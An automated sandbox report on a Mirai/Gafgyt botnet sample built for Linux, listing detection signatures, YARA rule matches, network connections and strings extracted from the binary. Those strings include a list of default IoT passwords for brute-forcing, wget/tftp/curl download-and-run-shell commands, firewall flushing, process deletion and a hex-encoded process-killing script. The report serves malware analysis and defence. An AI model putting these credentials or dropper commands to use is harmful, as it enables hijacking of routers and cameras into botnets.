Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
i686.elf

Overview

General Information

Sample name:i686.elf
Analysis ID:1584595
MD5:8f0239e6b5b39a97e8e64ff9217b00a0
SHA1:21fc853d5b63878943c811c295ebc8b06ff6932b
SHA256:ddbe5a641b1f5132023c52c0fcff8f8d22f8bae192c6a219d9131a241eb1d65e
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Deletes system log files
Machine Learning detection for sample
Performs DNS TXT record lookups
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584595
Start date and time:2025-01-06 00:52:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 58s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i686.elf
Detection:MAL
Classification:mal80.troj.evad.linELF@0/1@1/0
  • VT rate limit hit for: i686.elf
Command:/tmp/i686.elf
PID:6209
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB aNd fOxNoIntel lEarNs sHiT
Standard Error:
  • system is lnxubuntu20
  • i686.elf (PID: 6209, Parent: 6129, MD5: 8f0239e6b5b39a97e8e64ff9217b00a0) Arguments: /tmp/i686.elf
    • i686.elf New Fork (PID: 6210, Parent: 6209)
    • i686.elf New Fork (PID: 6211, Parent: 6209)
    • i686.elf New Fork (PID: 6229, Parent: 6209)
    • i686.elf New Fork (PID: 6247, Parent: 6209)
    • i686.elf New Fork (PID: 6271, Parent: 6209)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
i686.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    i686.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xe0f8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    i686.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xe8e7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    i686.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0xa5fa:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0xa75c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    i686.elfLinux_Trojan_Gafgyt_d996d335unknownunknown
    • 0x1131a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
    Click to see the 3 entries
    SourceRuleDescriptionAuthorStrings
    6209.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6247.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        6247.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
        • 0xe0f8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
        6247.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
        • 0xe8e7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
        6247.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
        • 0xa5fa:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
        • 0xa75c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
        Click to see the 11 entries
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: i686.elfReversingLabs: Detection: 34%
        Source: i686.elfJoe Sandbox ML: detected
        Source: i686.elfString: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
        Source: global trafficTCP traffic: 192.168.2.23:54640 -> 188.166.182.194:5837
        Source: global trafficUDP traffic: 192.168.2.23:41277 -> 74.125.250.129:19302
        Source: /tmp/i686.elf (PID: 6209)Socket: 127.0.0.1:43478Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: unknownTCP traffic detected without corresponding DNS query: 172.63.52.23
        Source: unknownTCP traffic detected without corresponding DNS query: 172.63.52.23
        Source: unknownTCP traffic detected without corresponding DNS query: 95.173.38.84
        Source: unknownTCP traffic detected without corresponding DNS query: 86.245.117.227
        Source: unknownTCP traffic detected without corresponding DNS query: 95.173.38.84
        Source: unknownTCP traffic detected without corresponding DNS query: 161.197.207.10
        Source: unknownTCP traffic detected without corresponding DNS query: 86.245.117.227
        Source: unknownTCP traffic detected without corresponding DNS query: 161.197.207.10
        Source: unknownTCP traffic detected without corresponding DNS query: 218.185.163.100
        Source: unknownTCP traffic detected without corresponding DNS query: 218.185.163.100
        Source: unknownTCP traffic detected without corresponding DNS query: 218.185.163.100
        Source: unknownTCP traffic detected without corresponding DNS query: 172.63.52.23
        Source: unknownTCP traffic detected without corresponding DNS query: 86.245.117.227
        Source: unknownTCP traffic detected without corresponding DNS query: 95.173.38.84
        Source: unknownTCP traffic detected without corresponding DNS query: 161.197.207.10
        Source: unknownTCP traffic detected without corresponding DNS query: 218.185.163.100
        Source: unknownTCP traffic detected without corresponding DNS query: 172.63.52.23
        Source: unknownTCP traffic detected without corresponding DNS query: 161.197.207.10
        Source: unknownTCP traffic detected without corresponding DNS query: 86.245.117.227
        Source: unknownTCP traffic detected without corresponding DNS query: 95.173.38.84
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
        Source: global trafficDNS traffic detected: DNS query: www.onlydance.cam
        Source: i686.elfString found in binary or memory: http:///curl.sh
        Source: i686.elfString found in binary or memory: http:///wget.sh
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

        System Summary

        barindex
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
        Source: Initial sampleString containing 'busybox' found: usage: busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
        Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
        Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
        Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
        Source: Initial sampleString containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | s
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/i686.elf (PID: 6210)SIGKILL sent: pid: 936, result: successfulJump to behavior
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
        Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
        Source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
